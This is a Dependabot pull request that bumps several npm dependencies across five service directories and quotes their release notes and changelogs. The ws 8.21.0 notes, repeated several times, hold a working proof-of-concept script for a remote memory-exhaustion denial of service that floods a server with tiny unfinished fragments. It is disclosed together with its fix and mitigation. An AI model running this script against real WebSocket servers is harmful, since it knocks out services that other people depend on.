Skip to content

chore(deps): bump the npm_and_yarn group across 5 directories with 9 updates#2194

Open
dependabot[bot] wants to merge 1 commit into
mainfrom
dependabot/npm_and_yarn/npm_and_yarn-475f5aad77
Open

chore(deps): bump the npm_and_yarn group across 5 directories with 9 updates#2194
dependabot[bot] wants to merge 1 commit into
mainfrom
dependabot/npm_and_yarn/npm_and_yarn-475f5aad77

Conversation

@dependabot

@dependabot dependabot Bot commented on behalf of github Jul 14, 2026

Copy link
Copy Markdown
Contributor

Bumps the npm_and_yarn group with 5 updates in the /services/api directory:

Package From To
@nestjs/platform-fastify 11.1.23 11.1.24
nodemailer 8.0.5 9.0.1
typeorm 0.3.27 0.3.31
form-data 4.0.5 4.0.6
ws 8.20.1 8.21.0

Bumps the npm_and_yarn group with 3 updates in the /services/auth-api directory: @nestjs/platform-fastify, form-data and undici.
Bumps the npm_and_yarn group with 2 updates in the /services/auth-ui directory: js-yaml and vite.
Bumps the npm_and_yarn group with 2 updates in the /services/homepage directory: js-yaml and vite.
Bumps the npm_and_yarn group with 4 updates in the /services/web-ui directory: js-yaml, vite, ws and esbuild.

Updates @nestjs/platform-fastify from 11.1.23 to 11.1.24

Release notes

Sourced from @​nestjs/platform-fastify's releases.

v11.1.24 (2026-05-25)

Bug fixes

Enhancements

Dependencies

Committers: 2

Commits

Updates nodemailer from 8.0.5 to 9.0.1

Release notes

Sourced from nodemailer's releases.

v9.0.1

9.0.1 (2026-06-17)

Bug Fixes

  • enforce disableFileAccess/disableUrlAccess for raw message option (a82e060)

v9.0.0

9.0.0 (2026-06-14)

⚠ BREAKING CHANGES

  • HTTPS requests made while fetching remote content (attachment href/path URLs, OAuth2 token endpoints, HTTP/HTTPS proxy CONNECT) now validate the server's TLS certificate by default. Requests to hosts with self-signed, expired, or hostname-mismatched certificates that previously succeeded will now fail. Opt back out per request with tls.rejectUnauthorized=false (transport options, or a per-attachment tls option).

Bug Fixes

  • replace deprecated url.parse with a WHATWG URL wrapper (0c080fb)
  • validate TLS certificates by default when fetching remote content (6a947ac)

v8.0.11

8.0.11 (2026-06-10)

Bug Fixes

  • apply the transport-level newline option in stream and sendmail transports (cb4f904)
  • include icalEvent path/href content in the application/ics attachment (b801c48)
  • parse Ethereal response props without polynomial regex backtracking (067aebe)
  • resolve oauth2_provision_cb at send time for non-pooled SMTP transports (203c8ec)
  • return the promise from every resolveContent branch (07ffe8c)
  • strip the url scheme from List-ID header values (77e5885)
  • tag AWS SES transport errors with the ESES code (efa647a)

v8.0.10

8.0.10 (2026-05-29)

Bug Fixes

  • fall back to lower-severity handler when custom logger lacks a level method (6d849df)

v8.0.9

8.0.9 (2026-05-26)

Bug Fixes

  • two pending security advisories (jsonTransport access bypass, List-* CRLF injection) (#1820) (5f69497)

... (truncated)

Changelog

Sourced from nodemailer's changelog.

9.0.1 (2026-06-17)

Bug Fixes

  • enforce disableFileAccess/disableUrlAccess for raw message option (a82e060)

9.0.0 (2026-06-14)

⚠ BREAKING CHANGES

  • HTTPS requests made while fetching remote content (attachment href/path URLs, OAuth2 token endpoints, HTTP/HTTPS proxy CONNECT) now validate the server's TLS certificate by default. Requests to hosts with self-signed, expired, or hostname-mismatched certificates that previously succeeded will now fail. Opt back out per request with tls.rejectUnauthorized=false (transport options, or a per-attachment tls option).

Bug Fixes

  • replace deprecated url.parse with a WHATWG URL wrapper (0c080fb)
  • validate TLS certificates by default when fetching remote content (6a947ac)

8.0.11 (2026-06-10)

Bug Fixes

  • apply the transport-level newline option in stream and sendmail transports (cb4f904)
  • include icalEvent path/href content in the application/ics attachment (b801c48)
  • parse Ethereal response props without polynomial regex backtracking (067aebe)
  • resolve oauth2_provision_cb at send time for non-pooled SMTP transports (203c8ec)
  • return the promise from every resolveContent branch (07ffe8c)
  • strip the url scheme from List-ID header values (77e5885)
  • tag AWS SES transport errors with the ESES code (efa647a)

8.0.10 (2026-05-29)

Bug Fixes

  • fall back to lower-severity handler when custom logger lacks a level method (6d849df)

8.0.9 (2026-05-26)

Bug Fixes

  • two pending security advisories (jsonTransport access bypass, List-* CRLF injection) (#1820) (5f69497)

8.0.8 (2026-05-23)

Bug Fixes

... (truncated)

Commits
  • 69cf625 chore(master): release 9.0.1 (#1828)
  • a82e060 fix: enforce disableFileAccess/disableUrlAccess for raw message option
  • 4e58450 chore: update dev dependencies
  • 541f5fd chore(master): release 9.0.0 (#1827)
  • 0c080fb fix: replace deprecated url.parse with a WHATWG URL wrapper
  • 6a947ac fix!: validate TLS certificates by default when fetching remote content
  • e3b1bda chore(master): release 8.0.11 (#1826)
  • 4358caf refactor: remove dead checks flagged by Code Quality analysis
  • cf5195c chore: harden workflow token permissions and update GitHub Actions
  • 067aebe fix: parse Ethereal response props without polynomial regex backtracking
  • Additional commits viewable in compare view

Updates typeorm from 0.3.27 to 0.3.31

Release notes

Sourced from typeorm's releases.

0.3.31

Bug Fixes

  • cache: release query runner on error in storeInCache (#12545) (a84b9b3)
  • correct grammar in AlreadyHasActiveConnectionError message (#12554) (304d129)
  • entity-manager: default invalidWhereValuesBehavior to throw on the write path (#12690) (44d8052)
  • entity-manager: validate where criteria in increment/decrement (#12692) (8a51b75)
  • mongodb: use cursor.transform for doc to entity transformation and skip load broadcast in next if toArray (#11926) (0bbefc9)
  • move hashing function to PlatformTools (#12648) (c456cbd)
  • multiple recursive cte problems (#12490) (7c26654)
  • normalization of FindOptionsWhere for arrays and Buffers (#12577) (a8173fc)
  • persistence: preserve select false columns on the in-memory entity after save() (#12501) (324c46c)
  • postgres: improve normalizeDatetimeFunction for tstzrange data type (#12182) (bf47c9f)
  • query-builder: reject empty where criteria on update and delete operations (#12629) (81b9466)
  • query-builder: wrap inner joins under left joins correctly (#11137) (d5f4b9d)
  • remove require() calls that break bundlers (#12647) (30f9fc7)
  • tree-entity: tree entity schema propagation in internal TreeRepository methods (#12590) (7fb7c2c)

Full Changelog: typeorm/typeorm@0.3.30...0.3.31

0.3.30

What's Changed

Full Changelog: typeorm/typeorm@0.3.29...0.3.30

0.3.29

What's Changed

... (truncated)

Changelog

Sourced from typeorm's changelog.

0.3.31 (2026-07-13)

Bug Fixes

  • docs: correct project name in release flow (#12519) (3b9faa3)
  • docs: resolve docs workflow issues (c3c09b0)
  • docs: resolve docs workflow issues (f7b4b63)
  • entity-manager: validate where criteria in increment/decrement (#12692) (a69a8c6)
  • migration: escape backslashes and interpolation in generated template literals (b175f9b)
  • normalization of FindOptionsWhere for arrays and Buffers (#12577) (a309182)
  • persistence: preserve select false columns on the in-memory entity after save() (#12501) (d8e9127)
  • query-builder: reject empty where criteria on update and delete operations (#12629) (dfd972b)
  • tree-entity: tree entity schema propagation in internal TreeRepository methods (#12590) (e1f93da)

0.3.30 (2026-05-18)

Bug Fixes

  • cockroachdb: adjust join in loadTables to load correct table columns (#12413) (d93402e)
  • find-options: allow array values in JsonContains (#12420) (90f169d)
  • preserve user-defined shared join columns in change set (#12354) (0aba011)
  • scope computed-columns join to correct table in MSSQL schema query (#12288) (6170be6)
  • scope invalidWhereValuesBehavior to high-level abstractions only (#11878) (1e10fb8), closes hi#level

Reverts

0.3.29 (2026-05-08)

Bug Fixes

  • add async to the method using setFindOptions() (#10787) (cc07c90)
  • change import for process dependency (#11248) (1c67c3b)
  • cli: init command loading non-existing package.json (#11947) (4d9d1a6)
  • fix up aggregate methods ambiguous column (#11822) (6e34756)
  • fix up limit with joins (#11987) (3657db8)
  • getPendingMigrations unnecessarily creating migrations table (#11672) (1dbc224)
  • postgres: execute queries sequentially to avoid pg 8.19.0 deprecation warning (#12105) (79829a0)
  • prevent columns with select false from being returned (#11944) (6b20831)
  • prevent eager-loaded entities from overwriting manual relations (#11267) (2d8c515)
  • propagate schema and database to closure junction table (#12110) (58b403f)
  • redis: redis cache version detection (#11936) (f22c7a2)
  • release query runner when there is no migration to revert (#11232) (a46eb0a)
  • sap: QueryBuilder parameter of type JS Date not escaped correctly (#11867) (5153436)
  • security: validate limit() in Update/SoftDelete query builders (#12437) (0d7991a)

... (truncated)

Commits
  • 7973203 ci: publish to npm from v0 using the legacy tag
  • 92e9276 ci: use npm@11
  • 099c23e chore: prepare release 0.3.31 (#12676)
  • b175f9b Merge commit from fork
  • a69a8c6 fix(entity-manager): validate where criteria in increment/decrement (#12692)
  • dfd972b fix(query-builder): reject empty where criteria on update and delete operatio...
  • a2d4363 chore: update deps (#12661)
  • e1f93da fix(tree-entity): tree entity schema propagation in internal TreeRepository m...
  • a309182 fix: normalization of FindOptionsWhere for arrays and Buffers (#12577)
  • d8e9127 fix(persistence): preserve select false columns on the in-memory entity after...
  • Additional commits viewable in compare view
Maintainer changes

This version was pushed to npm by GitHub Actions, a new releaser for typeorm since your current version.


Updates form-data from 4.0.5 to 4.0.6

Changelog

Sourced from form-data's changelog.

v4.0.6 - 2026-06-12

Commits

  • [Fix] escape CR, LF, and " in field names and filenames 8dff42c
  • [Dev Deps] update @ljharb/eslint-config, auto-changelog, tape f31d21e
  • [Deps] update hasown, mime-types 92ae0eb
  • [Dev Deps] update js-randomness-predictor 67b0f65
Commits
  • 64190db v4.0.6
  • 92ae0eb [Deps] update hasown, mime-types
  • f31d21e [Dev Deps] update @ljharb/eslint-config, auto-changelog, tape
  • 8dff42c [Fix] escape CR, LF, and " in field names and filenames
  • 67b0f65 [Dev Deps] update js-randomness-predictor
  • See full diff in compare view

Updates ws from 8.20.1 to 8.21.0

Release notes

Sourced from ws's releases.

8.21.0

Features

  • Introduced the maxBufferedChunks and maxFragments options (2b2abd45).

Bug fixes

  • Fixed a remote memory exhaustion DoS vulnerability (2b2abd45).

A high volume of tiny fragments and data chunks could be sent by a peer, using modest network traffic, to crash a ws server or client due to OOM.

import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () {
const data = Buffer.alloc(1);
const options = { fin: false };
const { port } = wss.address();
const ws = new WebSocket(ws://localhost:${port});
ws.on('open', function () {
(function send() {
ws.send(data, options, function (err) {
if (err) return;
send();
});
})();
});
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(client close - code: ${code} reason: ${reason.toString()});
});
});
wss.on('connection', function (ws) {
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(server close - code: ${code} reason: ${reason.toString()});
});
});

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

Commits

Updates @nestjs/platform-fastify from 11.1.23 to 11.1.24

Release notes

Sourced from @​nestjs/platform-fastify's releases.

v11.1.24 (2026-05-25)

Bug fixes

Enhancements

Dependencies

Committers: 2

Commits

Updates form-data from 4.0.5 to 4.0.6

Changelog

Sourced from form-data's changelog.

v4.0.6 - 2026-06-12

Commits

  • [Fix] escape CR, LF, and " in field names and filenames 8dff42c
  • [Dev Deps] update @ljharb/eslint-config, auto-changelog, tape f31d21e
  • [Deps] update hasown, mime-types 92ae0eb
  • [Dev Deps] update js-randomness-predictor 67b0f65
Commits
  • 64190db v4.0.6
  • 92ae0eb [Deps] update hasown, mime-types
  • f31d21e [Dev Deps] update @ljharb/eslint-config, auto-changelog, tape
  • 8dff42c [Fix] escape CR, LF, and " in field names and filenames
  • 67b0f65 [Dev Deps] update js-randomness-predictor
  • See full diff in compare view

Updates nodemailer from 8.0.5 to 9.0.1

Release notes

Sourced from nodemailer's releases.

v9.0.1

9.0.1 (2026-06-17)

Bug Fixes

  • enforce disableFileAccess/disableUrlAccess for raw message option (a82e060)

v9.0.0

9.0.0 (2026-06-14)

⚠ BREAKING CHANGES

  • HTTPS requests made while fetching remote content (attachment href/path URLs, OAuth2 token endpoints, HTTP/HTTPS proxy CONNECT) now validate the server's TLS certificate by default. Requests to hosts with self-signed, expired, or hostname-mismatched certificates that previously succeeded will now fail. Opt back out per request with tls.rejectUnauthorized=false (transport options, or a per-attachment tls option).

Bug Fixes

  • replace deprecated url.parse with a WHATWG URL wrapper (0c080fb)
  • validate TLS certificates by default when fetching remote content (6a947ac)

v8.0.11

8.0.11 (2026-06-10)

Bug Fixes

  • apply the transport-level newline option in stream and sendmail transports (cb4f904)
  • include icalEvent path/href content in the application/ics attachment (b801c48)
  • parse Ethereal response props without polynomial regex backtracking (067aebe)
  • resolve oauth2_provision_cb at send time for non-pooled SMTP transports (203c8ec)
  • return the promise from every resolveContent branch (07ffe8c)
  • strip the url scheme from List-ID header values (77e5885)
  • tag AWS SES transport errors with the ESES code (efa647a)

v8.0.10

8.0.10 (2026-05-29)

Bug Fixes

  • fall back to lower-severity handler when custom logger lacks a level method (6d849df)

v8.0.9

8.0.9 (2026-05-26)

Bug Fixes

  • two pending security advisories (jsonTransport access bypass, List-* CRLF injection) (#1820) (5f69497)

... (truncated)

Changelog

Sourced from nodemailer's changelog.

9.0.1 (2026-06-17)

Bug Fixes

  • enforce disableFileAccess/disableUrlAccess for raw message option (a82e060)

9.0.0 (2026-06-14)

⚠ BREAKING CHANGES

  • HTTPS requests made while fetching remote content (attachment href/path URLs, OAuth2 token endpoints, HTTP/HTTPS proxy CONNECT) now validate the server's TLS certificate by default. Requests to hosts with self-signed, expired, or hostname-mismatched certificates that previously succeeded will now fail. Opt back out per request with tls.rejectUnauthorized=false (transport options, or a per-attachment tls option).

Bug Fixes

  • replace deprecated url.parse with a WHATWG URL wrapper (0c080fb)
  • validate TLS certificates by default when fetching remote content (6a947ac)

8.0.11 (2026-06-10)

Bug Fixes

  • apply the transport-level newline option in stream and sendmail transports (cb4f904)
  • include icalEvent path/href content in the application/ics attachment (b801c48)
  • parse Ethereal response props without polynomial regex backtracking (067aebe)
  • resolve oauth2_provision_cb at send time for non-pooled SMTP transports (203c8ec)
  • return the promise from every resolveContent branch (07ffe8c)
  • strip the url scheme from List-ID header values (77e5885)
  • tag AWS SES transport errors with the ESES code (efa647a)

8.0.10 (2026-05-29)

Bug Fixes

  • fall back to lower-severity handler when custom logger lacks a level method (6d849df)

8.0.9 (2026-05-26)

Bug Fixes

  • two pending security advisories (jsonTransport access bypass, List-* CRLF injection) (#1820) (5f69497)

8.0.8 (2026-05-23)

Bug Fixes

... (truncated)

Commits
  • 69cf625 chore(master): release 9.0.1 (#1828)
  • a82e060 fix: enforce disableFileAccess/disableUrlAccess for raw message option
  • 4e58450 chore: update dev dependencies
  • 541f5fd chore(master): release 9.0.0 (#1827)
  • 0c080fb fix: replace deprecated url.parse with a WHATWG URL wrapper
  • 6a947ac fix!: validate TLS certificates by default when fetching remote content
  • e3b1bda chore(master): release 8.0.11 (#1826)
  • 4358caf refactor: remove dead checks flagged by Code Quality analysis
  • cf5195c chore: harden workflow token permissions and update GitHub Actions
  • 067aebe fix: parse Ethereal response props without polynomial regex backtracking
  • Additional commits viewable in compare view

Updates ws from 8.20.1 to 8.21.0

Release notes

Sourced from ws's releases.

8.21.0

Features

  • Introduced the maxBufferedChunks and maxFragments options (2b2abd45).

Bug fixes

  • Fixed a remote memory exhaustion DoS vulnerability (2b2abd45).

A high volume of tiny fragments and data chunks could be sent by a peer, using modest network traffic, to crash a ws server or client due to OOM.

import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () {
const data = Buffer.alloc(1);
const options = { fin: false };
const { port } = wss.address();
const ws = new WebSocket(ws://localhost:${port});
ws.on('open', function () {
(function send() {
ws.send(data, options, function (err) {
if (err) return;
send();
});
})();
});
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(client close - code: ${code} reason: ${reason.toString()});
});
});
wss.on('connection', function (ws) {
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(server close - code: ${code} reason: ${reason.toString()});
});
});

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

Commits

Updates ws from 8.20.1 to 8.21.0

Release notes

Sourced from ws's releases.

8.21.0

Features

  • Introduced the maxBufferedChunks and maxFragments options (2b2abd45).

Bug fixes

  • Fixed a remote memory exhaustion DoS vulnerability (2b2abd45).

A high volume of tiny fragments and data chunks could be sent by a peer, using modest network traffic, to crash a ws server or client due to OOM.

import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () {
const data = Buffer.alloc(1);
const options = { fin: false };
const { port } = wss.address();
const ws = new WebSocket(ws://localhost:${port});
ws.on('open', function () {
(function send() {
ws.send(data, options, function (err) {
if (err) return;
send();
});
})();
});
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(client close - code: ${code} reason: ${reason.toString()});
});
});
wss.on('connection', function (ws) {
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(server close - code: ${code} reason: ${reason.toString()});
});
});

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

Commits

Updates ws from 8.20.1 to 8.21.0

Release notes

Sourced from ws's releases.

8.21.0

Features

  • Introduced the maxBufferedChunks and maxFragments options (2b2abd45).

Bug fixes

  • Fixed a remote memory exhaustion DoS vulnerability (2b2abd45).

A high volume of tiny fragments and data chunks could be sent by a peer, using modest network traffic, to crash a ws server or client due to OOM.

import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () {
const data = Buffer.alloc(1);
const options = { fin: false };
const { port } = wss.address();
const ws = new WebSocket(ws://localhost:${port});
ws.on('open', function () {
(function send() {
ws.send(data, options, function (err) {
if (err) return;
send();
});
})();
});
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(client close - code: ${code} reason: ${reason.toString()});
});
});
wss.on('connection', function (ws) {
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(server close - code: ${code} reason: ${reason.toString()});
});
});

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

Commits

Updates @nestjs/platform-fastify from 11.1.23 to 11.1.24

Release notes

Sourced from @​nestjs/platform-fastify's releases.

v11.1.24 (2026-05-25)

Bug fixes

Enhancements

Dependencies

Committers: 2

Commits

Updates form-data from 4.0.5 to 4.0.6

Changelog

Sourced from form-data's changelog.

v4.0.6 - 2026-06-12

Commits

  • [Fix] escape CR, LF, and " in field names and filenames 8dff42c
  • [Dev Deps] update @ljharb/eslint-config, auto-changelog, tape f31d21e
  • [Deps] update hasown, mime-types 92ae0eb
  • [Dev Deps] update js-randomness-predictor 67b0f65
Commits
  • 64190db v4.0.6
  • 92ae0eb [Deps] update hasown, mime-types
  • f31d21e [Dev Deps] update @ljharb/eslint-config, auto-changelog, tape
  • 8dff42c [Fix] escape CR, LF, and " in field names and filenames
  • 67b0f65 [Dev Deps] update js-randomness-predictor
  • See full diff in compare view

Updates @nestjs/platform-fastify from 11.1.23 to 11.1.24

Release notes

Sourced from @​nestjs/platform-fastify's releases.

v11.1.24 (2026-05-25)

Bug fixes

Enhancements

Dependencies

Committers: 2

Commits

Updates form-data from 4.0.5 to 4.0.6

Changelog

Sourced from form-data's changelog.

v4.0.6 - 2026-06-12

Commits

  • [Fix] escape CR, LF, and " in field names and filenames

@dependabot dependabot Bot added dependencies Pull requests that update a dependency file javascript Pull requests that update javascript code labels Jul 14, 2026
…updates

Bumps the npm_and_yarn group with 5 updates in the /services/api directory:

| Package | From | To |
| --- | --- | --- |
| [@nestjs/platform-fastify](https://github.com/nestjs/nest/tree/HEAD/packages/platform-fastify) | `11.1.23` | `11.1.24` |
| [nodemailer](https://github.com/nodemailer/nodemailer) | `8.0.5` | `9.0.1` |
| [typeorm](https://github.com/typeorm/typeorm) | `0.3.27` | `0.3.31` |
| [form-data](https://github.com/form-data/form-data) | `4.0.5` | `4.0.6` |
| [ws](https://github.com/websockets/ws) | `8.20.1` | `8.21.0` |

Bumps the npm_and_yarn group with 3 updates in the /services/auth-api directory: [@nestjs/platform-fastify](https://github.com/nestjs/nest/tree/HEAD/packages/platform-fastify), [form-data](https://github.com/form-data/form-data) and [undici](https://github.com/nodejs/undici).
Bumps the npm_and_yarn group with 2 updates in the /services/auth-ui directory: [js-yaml](https://github.com/nodeca/js-yaml) and [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite).
Bumps the npm_and_yarn group with 2 updates in the /services/homepage directory: [js-yaml](https://github.com/nodeca/js-yaml) and [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite).
Bumps the npm_and_yarn group with 4 updates in the /services/web-ui directory: [js-yaml](https://github.com/nodeca/js-yaml), [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite), [ws](https://github.com/websockets/ws) and [esbuild](https://github.com/evanw/esbuild).


Updates `@nestjs/platform-fastify` from 11.1.23 to 11.1.24
- [Release notes](https://github.com/nestjs/nest/releases)
- [Commits](https://github.com/nestjs/nest/commits/v11.1.24/packages/platform-fastify)

Updates `nodemailer` from 8.0.5 to 9.0.1
- [Release notes](https://github.com/nodemailer/nodemailer/releases)
- [Changelog](https://github.com/nodemailer/nodemailer/blob/master/CHANGELOG.md)
- [Commits](nodemailer/nodemailer@v8.0.5...v9.0.1)

Updates `typeorm` from 0.3.27 to 0.3.31
- [Release notes](https://github.com/typeorm/typeorm/releases)
- [Changelog](https://github.com/typeorm/typeorm/blob/0.3.31/CHANGELOG.md)
- [Commits](typeorm/typeorm@0.3.27...0.3.31)

Updates `form-data` from 4.0.5 to 4.0.6
- [Changelog](https://github.com/form-data/form-data/blob/master/CHANGELOG.md)
- [Commits](form-data/form-data@v4.0.5...v4.0.6)

Updates `ws` from 8.20.1 to 8.21.0
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@8.20.1...8.21.0)

Updates `@nestjs/platform-fastify` from 11.1.23 to 11.1.24
- [Release notes](https://github.com/nestjs/nest/releases)
- [Commits](https://github.com/nestjs/nest/commits/v11.1.24/packages/platform-fastify)

Updates `form-data` from 4.0.5 to 4.0.6
- [Changelog](https://github.com/form-data/form-data/blob/master/CHANGELOG.md)
- [Commits](form-data/form-data@v4.0.5...v4.0.6)

Updates `nodemailer` from 8.0.5 to 9.0.1
- [Release notes](https://github.com/nodemailer/nodemailer/releases)
- [Changelog](https://github.com/nodemailer/nodemailer/blob/master/CHANGELOG.md)
- [Commits](nodemailer/nodemailer@v8.0.5...v9.0.1)

Updates `ws` from 8.20.1 to 8.21.0
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@8.20.1...8.21.0)

Updates `ws` from 8.20.1 to 8.21.0
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@8.20.1...8.21.0)

Updates `ws` from 8.20.1 to 8.21.0
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@8.20.1...8.21.0)

Updates `@nestjs/platform-fastify` from 11.1.23 to 11.1.24
- [Release notes](https://github.com/nestjs/nest/releases)
- [Commits](https://github.com/nestjs/nest/commits/v11.1.24/packages/platform-fastify)

Updates `form-data` from 4.0.5 to 4.0.6
- [Changelog](https://github.com/form-data/form-data/blob/master/CHANGELOG.md)
- [Commits](form-data/form-data@v4.0.5...v4.0.6)

Updates `@nestjs/platform-fastify` from 11.1.23 to 11.1.24
- [Release notes](https://github.com/nestjs/nest/releases)
- [Commits](https://github.com/nestjs/nest/commits/v11.1.24/packages/platform-fastify)

Updates `form-data` from 4.0.5 to 4.0.6
- [Changelog](https://github.com/form-data/form-data/blob/master/CHANGELOG.md)
- [Commits](form-data/form-data@v4.0.5...v4.0.6)

Updates `undici` from 7.24.6 to 7.28.0
- [Release notes](https://github.com/nodejs/undici/releases)
- [Commits](nodejs/undici@v7.24.6...v7.28.0)

Updates `js-yaml` from 4.1.1 to 4.3.0
- [Changelog](https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md)
- [Commits](nodeca/js-yaml@4.1.1...4.3.0)

Updates `js-yaml` from 4.1.1 to 4.3.0
- [Changelog](https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md)
- [Commits](nodeca/js-yaml@4.1.1...4.3.0)

Updates `vite` from 6.4.2 to 8.1.4
- [Release notes](https://github.com/vitejs/vite/releases)
- [Changelog](https://github.com/vitejs/vite/blob/main/packages/vite/CHANGELOG.md)
- [Commits](https://github.com/vitejs/vite/commits/v8.1.4/packages/vite)

Updates `js-yaml` from 4.1.1 to 4.3.0
- [Changelog](https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md)
- [Commits](nodeca/js-yaml@4.1.1...4.3.0)

Updates `vite` from 6.4.2 to 8.1.4
- [Release notes](https://github.com/vitejs/vite/releases)
- [Changelog](https://github.com/vitejs/vite/blob/main/packages/vite/CHANGELOG.md)
- [Commits](https://github.com/vitejs/vite/commits/v8.1.4/packages/vite)

Updates `js-yaml` from 4.1.1 to 4.3.0
- [Changelog](https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md)
- [Commits](nodeca/js-yaml@4.1.1...4.3.0)

Updates `vite` from 6.4.2 to 8.1.4
- [Release notes](https://github.com/vitejs/vite/releases)
- [Changelog](https://github.com/vitejs/vite/blob/main/packages/vite/CHANGELOG.md)
- [Commits](https://github.com/vitejs/vite/commits/v8.1.4/packages/vite)

Updates `js-yaml` from 4.1.1 to 4.3.0
- [Changelog](https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md)
- [Commits](nodeca/js-yaml@4.1.1...4.3.0)

Updates `vite` from 6.4.2 to 8.1.4
- [Release notes](https://github.com/vitejs/vite/releases)
- [Changelog](https://github.com/vitejs/vite/blob/main/packages/vite/CHANGELOG.md)
- [Commits](https://github.com/vitejs/vite/commits/v8.1.4/packages/vite)

Updates `js-yaml` from 4.1.1 to 4.3.0
- [Changelog](https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md)
- [Commits](nodeca/js-yaml@4.1.1...4.3.0)

Updates `js-yaml` from 4.1.1 to 4.3.0
- [Changelog](https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md)
- [Commits](nodeca/js-yaml@4.1.1...4.3.0)

Updates `js-yaml` from 4.1.1 to 4.3.0
- [Changelog](https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md)
- [Commits](nodeca/js-yaml@4.1.1...4.3.0)

Updates `vite` from 6.4.2 to 8.1.4
- [Release notes](https://github.com/vitejs/vite/releases)
- [Changelog](https://github.com/vitejs/vite/blob/main/packages/vite/CHANGELOG.md)
- [Commits](https://github.com/vitejs/vite/commits/v8.1.4/packages/vite)

Updates `js-yaml` from 4.1.1 to 4.3.0
- [Changelog](https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md)
- [Commits](nodeca/js-yaml@4.1.1...4.3.0)

Updates `vite` from 6.4.2 to 8.1.4
- [Release notes](https://github.com/vitejs/vite/releases)
- [Changelog](https://github.com/vitejs/vite/blob/main/packages/vite/CHANGELOG.md)
- [Commits](https://github.com/vitejs/vite/commits/v8.1.4/packages/vite)

Updates `js-yaml` from 4.1.1 to 4.3.0
- [Changelog](https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md)
- [Commits](nodeca/js-yaml@4.1.1...4.3.0)

Updates `vite` from 6.4.2 to 8.1.4
- [Release notes](https://github.com/vitejs/vite/releases)
- [Changelog](https://github.com/vitejs/vite/blob/main/packages/vite/CHANGELOG.md)
- [Commits](https://github.com/vitejs/vite/commits/v8.1.4/packages/vite)

Updates `js-yaml` from 4.1.1 to 4.3.0
- [Changelog](https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md)
- [Commits](nodeca/js-yaml@4.1.1...4.3.0)

Updates `vite` from 6.4.2 to 8.1.4
- [Release notes](https://github.com/vitejs/vite/releases)
- [Changelog](https://github.com/vitejs/vite/blob/main/packages/vite/CHANGELOG.md)
- [Commits](https://github.com/vitejs/vite/commits/v8.1.4/packages/vite)

Updates `js-yaml` from 4.1.1 to 4.3.0
- [Changelog](https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md)
- [Commits](nodeca/js-yaml@4.1.1...4.3.0)

Updates `js-yaml` from 4.1.1 to 4.3.0
- [Changelog](https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md)
- [Commits](nodeca/js-yaml@4.1.1...4.3.0)

Updates `js-yaml` from 4.1.1 to 4.3.0
- [Changelog](https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md)
- [Commits](nodeca/js-yaml@4.1.1...4.3.0)

Updates `vite` from 7.3.2 to 8.1.4
- [Release notes](https://github.com/vitejs/vite/releases)
- [Changelog](https://github.com/vitejs/vite/blob/main/packages/vite/CHANGELOG.md)
- [Commits](https://github.com/vitejs/vite/commits/v8.1.4/packages/vite)

Updates `ws` from 8.20.1 to 8.21.0
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@8.20.1...8.21.0)

Updates `js-yaml` from 4.1.1 to 4.3.0
- [Changelog](https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md)
- [Commits](nodeca/js-yaml@4.1.1...4.3.0)

Updates `ws` from 8.20.1 to 8.21.0
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@8.20.1...8.21.0)

Updates `vite` from 7.3.2 to 8.1.4
- [Release notes](https://github.com/vitejs/vite/releases)
- [Changelog](https://github.com/vitejs/vite/blob/main/packages/vite/CHANGELOG.md)
- [Commits](https://github.com/vitejs/vite/commits/v8.1.4/packages/vite)

Updates `esbuild` from 0.25.3 to 0.28.1
- [Release notes](https://github.com/evanw/esbuild/releases)
- [Changelog](https://github.com/evanw/esbuild/blob/main/CHANGELOG-2025.md)
- [Commits](evanw/esbuild@v0.25.3...v0.28.1)

Updates `js-yaml` from 4.1.1 to 4.3.0
- [Changelog](https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md)
- [Commits](nodeca/js-yaml@4.1.1...4.3.0)

Updates `ws` from 8.20.1 to 8.21.0
